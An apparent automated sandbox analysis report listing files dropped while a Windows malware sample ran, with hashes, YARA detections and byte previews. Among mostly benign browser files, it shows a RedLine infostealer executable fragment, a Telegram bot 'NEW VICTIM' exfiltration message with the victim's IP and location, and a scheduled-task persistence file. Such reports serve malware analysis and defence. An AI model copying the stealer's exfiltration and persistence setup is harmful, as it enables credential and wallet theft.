                                                                                                                                                                                                                            MD5:198799F6B4D29F63589B4D249BCFFBB7
                                                                                                                                                                                                                            SHA1:FCF79E85120CAEA49BE124CCE74D579DA7915212
                                                                                                                                                                                                                            SHA-256:E83D9D6975ABC2E8EA516D489AF5D1D4E49167D514DE192ED096F6D42704F43A
                                                                                                                                                                                                                            SHA-512:979CE09C191DCCBC958375A2843EB0339A9ED8FB027BE91C310F2257066D49F1B86A9F9BF937E4A6446D66A1CF0D14EB9ED104D7DC233BA2A30EAC24D17A35D2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://youtube.com/account?=.....rs.googl%...v3/signin/challenge/pwd","title[.C..cacheKey":0,"ID":6,"docshellUU...D"{e252ac56-98d0-46aa-996f-8fe9c09d7eb9}","resultPrincipalURI":null,"hasUserInteracte...true,"triggering8.p_base64z..\"3\":{}^...docIdentifier":7,"persistK..+}],"lastAccessed":1735041567329,"hidden":false,"searchMode...userContextId...attribut...{},"index":1...questedI..p0,"imag....chrome://global/skin/icons/warning.svg"..aselect...,"_closedTZ.@],"_...C..`GroupCF..":-1,"busy...t...Flags":2167541758....dth":1164,"height":891,"screenX":4...Y..Aizem..."maximized"...BeforeMin...&..workspace9...890d5fc3-0c4c-4214-a93a-b8e730a022a1","zD..1...Wm..l........j..:....1":{..iUpdate...30,"startTim..P26918...centCrash..B0},".....Dcook.. hoc..."addons.mozilla.org","valu...A4a32081674711da8c0af7e7198f4a549116c7011a74775b8dc2ae1b10b859df4","path":"/","na..a"taarI|.Recure...,`.Donly..fexpiry...47671,"originA...

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\recovery.jsonlz4.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 5861 bytes
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1569
                                                                                                                                                                                                                            Entropy (8bit):6.327242562111723
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:v+USUGlcAxSfLXnIgM/pnxQwRlszT5sCIdDqUVOQ3eHVY+qo+pTUkamhujJJX/q9:GUpOxWsnR6fuoQ3epfyTUk4JJNNIHiw
                                                                                                                                                                                                                            MD5:198799F6B4D29F63589B4D249BCFFBB7
                                                                                                                                                                                                                            SHA1:FCF79E85120CAEA49BE124CCE74D579DA7915212
                                                                                                                                                                                                                            SHA-256:E83D9D6975ABC2E8EA516D489AF5D1D4E49167D514DE192ED096F6D42704F43A
                                                                                                                                                                                                                            SHA-512:979CE09C191DCCBC958375A2843EB0339A9ED8FB027BE91C310F2257066D49F1B86A9F9BF937E4A6446D66A1CF0D14EB9ED104D7DC233BA2A30EAC24D17A35D2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://youtube.com/account?=.....rs.googl%...v3/signin/challenge/pwd","title[.C..cacheKey":0,"ID":6,"docshellUU...D"{e252ac56-98d0-46aa-996f-8fe9c09d7eb9}","resultPrincipalURI":null,"hasUserInteracte...true,"triggering8.p_base64z..\"3\":{}^...docIdentifier":7,"persistK..+}],"lastAccessed":1735041567329,"hidden":false,"searchMode...userContextId...attribut...{},"index":1...questedI..p0,"imag....chrome://global/skin/icons/warning.svg"..aselect...,"_closedTZ.@],"_...C..`GroupCF..":-1,"busy...t...Flags":2167541758....dth":1164,"height":891,"screenX":4...Y..Aizem..."maximized"...BeforeMin...&..workspace9...890d5fc3-0c4c-4214-a93a-b8e730a022a1","zD..1...Wm..l........j..:....1":{..iUpdate...30,"startTim..P26918...centCrash..B0},".....Dcook.. hoc..."addons.mozilla.org","valu...A4a32081674711da8c0af7e7198f4a549116c7011a74775b8dc2ae1b10b859df4","path":"/","na..a"taarI|.Recure...,`.Donly..fexpiry...47671,"originA...

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4411
                                                                                                                                                                                                                            Entropy (8bit):5.010280306576922
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YrSAYGudxUQZpExB1+anOpWZOVhFu1VuWxzzcsYMsku7f86SLAVL7DV9F5FtsfA6:ycGMTEr5RXxzzcBvbw6KkjVrrc2Rn27
                                                                                                                                                                                                                            MD5:AF390D496AF3A5B109F98B9EB77FFFD2
                                                                                                                                                                                                                            SHA1:641D77D46FA1EF48928A051616FDEE856BBA2EE7
                                                                                                                                                                                                                            SHA-256:4CF9AD76F9C61867A754C9F7639A7AA66BAE750171542C46620A5720C2961EDA
                                                                                                                                                                                                                            SHA-512:8F2B6F2F475D903EB1CB916E19A57042B3A01288942535148F50EAB86D992168EE24C23D7B5C1D84CD65D0855621E5A63543D0886537BBF7D36DC9EA69273892
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2024-12-24T11:59:11.035Z","profileAgeCreated":1696493964214,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4411
                                                                                                                                                                                                                            Entropy (8bit):5.010280306576922
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YrSAYGudxUQZpExB1+anOpWZOVhFu1VuWxzzcsYMsku7f86SLAVL7DV9F5FtsfA6:ycGMTEr5RXxzzcBvbw6KkjVrrc2Rn27
                                                                                                                                                                                                                            MD5:AF390D496AF3A5B109F98B9EB77FFFD2
                                                                                                                                                                                                                            SHA1:641D77D46FA1EF48928A051616FDEE856BBA2EE7
                                                                                                                                                                                                                            SHA-256:4CF9AD76F9C61867A754C9F7639A7AA66BAE750171542C46620A5720C2961EDA
                                                                                                                                                                                                                            SHA-512:8F2B6F2F475D903EB1CB916E19A57042B3A01288942535148F50EAB86D992168EE24C23D7B5C1D84CD65D0855621E5A63543D0886537BBF7D36DC9EA69273892
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2024-12-24T11:59:11.035Z","profileAgeCreated":1696493964214,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):307712
                                                                                                                                                                                                                            Entropy (8bit):5.0826199033637005
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:5cZqf7D342p/0+mAAkygmgQEgHaB1fA0PuTVAtkxz53RAeqiOL2bBOA:5cZqf7DIOnwT2B1fA0GTV8krAL
                                                                                                                                                                                                                            MD5:95B7A7CBC0AFF0215004C5A56EA5952C
                                                                                                                                                                                                                            SHA1:A1FB08B02975EC4869BCAF387D09D0ABCCED27E9
                                                                                                                                                                                                                            SHA-256:E9AA0B4540115B3DCEC3AF70B6DE27E54E4A0FA96D1D3CB33BAC121D804C1D61
                                                                                                                                                                                                                            SHA-512:97AC66DE88CAC709E37D59C8A388C18D69AA3422D275BE3E28B92E87167BCD87A310125E7DCA593FE1B66D2F826CB2E22B64D51EAC07DC94981DCD123E906961
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, Author: Joe Security
                                                                                                                                                                                                                            • Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, Author: Sekoia.io
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.....................................S.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                                                                            Entropy (8bit):4.99323851364312
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                                                                            MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                                                                            SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                                                                            SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                                                                            SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

                                                                                                                                                                                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):156917
                                                                                                                                                                                                                            Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                                            MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                            SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                            SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                            SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

                                                                                                                                                                                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):777
                                                                                                                                                                                                                            Entropy (8bit):5.12036310165638
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:YKOHry1JVBa4YGQVPe071kWD+PyoZEB6/asJENBm9c:YVHrQTBj/Q51OPtZpujMc
                                                                                                                                                                                                                            MD5:185DDD4B5CD00912220B4F7A07A72C1F
                                                                                                                                                                                                                            SHA1:C7804A0D7F075D9ED78A4C6C485FF4C9E77AF2A9
                                                                                                                                                                                                                            SHA-256:310EBD9FFBE0BD41E57B693D739BBC9466CCB8D9B70D3833172624DEFBA48487
                                                                                                                                                                                                                            SHA-512:3474B9593F2FF575ADCCF7CF08B6C009C8ADA44F4275139DA8C07763506D07D7A3790E26B6FCDA54205AA44FBEA275E5DDCD147AA32FEC30B52A4C0BD99824A8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"ok":true,"result":{"message_id":44898,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1735035969,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 760639\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

                                                                                                                                                                                                                            C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\cMTqzvmx9u.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):290
                                                                                                                                                                                                                            Entropy (8bit):3.438636909824944
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:5ev/MsAPbX7L1UEZ+lX1CGdKUe6tkHs+Zgty0lequt0:5w/mT7BQ1CGAFBZgtVrut0
                                                                                                                                                                                                                            MD5:559F8F6FE049B773ED08B3463ECD062E
                                                                                                                                                                                                                            SHA1:289583F1898B62FEDEE791F8CD35E316957E8420
                                                                                                                                                                                                                            SHA-256:F38E56512C8194E25E15002983E41A92CC72EA64DEC4FA3FA5B1BB52EB9A0825
                                                                                                                                                                                                                            SHA-512:819EF3FF19DB260D3EAF74B7D9F44AC45D59A11D2D9A4E21F965958747937CA7C2C83B299C6026BBC5DE89AFCAC7D0F16180A7574D0B4D93CE3E7E1227684FC7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.....;.....I....N:%.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................

                                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                            Entropy (8bit):4.372154505777906
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:yFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNsiLD:aV1QyWWI/glMM6kF7mqD
                                                                                                                                                                                                                            MD5:A2160EAC5AB30FAC3CBDD9FE89077E83
                                                                                                                                                                                                                            SHA1:D682388EB6BF9CB7005FA2CC947435F0EAB6BD3C
                                                                                                                                                                                                                            SHA-256:66D6FFDB228B89E6D12C6BDF33FAF7D1AE67B3BF81A504CD529396A5948D0DD8
                                                                                                                                                                                                                            SHA-512:99ED93961DE94A6E8C5378480C2EE6114B004E156AB57F4BBEA02BC016DE9911495C748622E599BF2D61BAE6D3C5E74EEBF258C431D1FF752A1D0E5FFF2A2E3D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR....U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            Chrome Cache Entry: 172

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4501)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4506
                                                                                                                                                                                                                            Entropy (8bit):5.835641883392448
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:yZlilt7p/jJsYUXYB6sRotSJIN666600ebx+hg5WhPRbcEteBWfGOSypfffQfL:amttrUXiNKN666600ebx+3hCueBtv
                                                                                                                                                                                                                            MD5:D1D7CE17C06520D46B6099927BEA4C2E
                                                                                                                                                                                                                            SHA1:2B146496F61EB3E5512EE5FD1D492B90EB91E340
                                                                                                                                                                                                                            SHA-256:0FCA96CC6E2128C7CFA9311E3D2711537591B9F9EA83F26126BD090AE7A82550
                                                                                                                                                                                                                            SHA-512:8931D2ECA94CEE6979D4F3FA41F8B904320FB8C18629B4902685A9B6C85A07725C53DAF9C01CE33A5B5208A0E3663A47719BFF79E89DED0F47599A4A1FA50688
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:)]}'.["",["amtrak trains","december 24th wordle answer","snowfall warning southern ontario","nintendo switch games","nebraska football","shrinking season 3","grocery stores hours christmas eve","rangers chris kreider"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wYmprazkSDUZvb3RiYWxsIHRlYW0yoghkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUVBQUFBQkFDQU1BQUFDZHQ0SHNBQUFBYjFCTVZFWGRBQUQvLy8vY0FBRGdORFRlR2hyaE9Eam5kbmJwaElUKyt2cmVGeGZqVDAvZUV4UGlRa0xoT3p2ZEJnYnFoNGZnS1NuOTlmWGlTVW5sWTJQcGdJRGtWbGJtYUdqNzZlbnp3TUR0bkp6NTN0NzY0K1AyMGRIeXRyYmdMeS84NysvdW82UG5jSER3ckt6cmpvNzF5TWlETWNXQ0FBQUNVMGxFUVZSWWhhWFg2NWFpTUF3QTRDVFFFZVFPSXFBd3FQait6N2dCbHRtaHRFaTMrYWZtZktlMWFkTkNMQnhGcExnS1VDWnhpQmdFcXFLN3JENjZ5cVF4QkRpWStxNFU4UldqMis4MEg4TkFUdUx3VTNRWUNBamtvSGZtcmdGbm04UnB3UVM0aXA4QW0yWUZ

                                                                                                                                                                                                                            Chrome Cache Entry: 173

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):117446
                                                                                                                                                                                                                            Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                            MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                            SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                            SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                            SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                            Chrome Cache Entry: 174

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                                            Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                            MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                            SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                            SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                            SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                            Chrome Cache Entry: 175

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                            Category:dropped
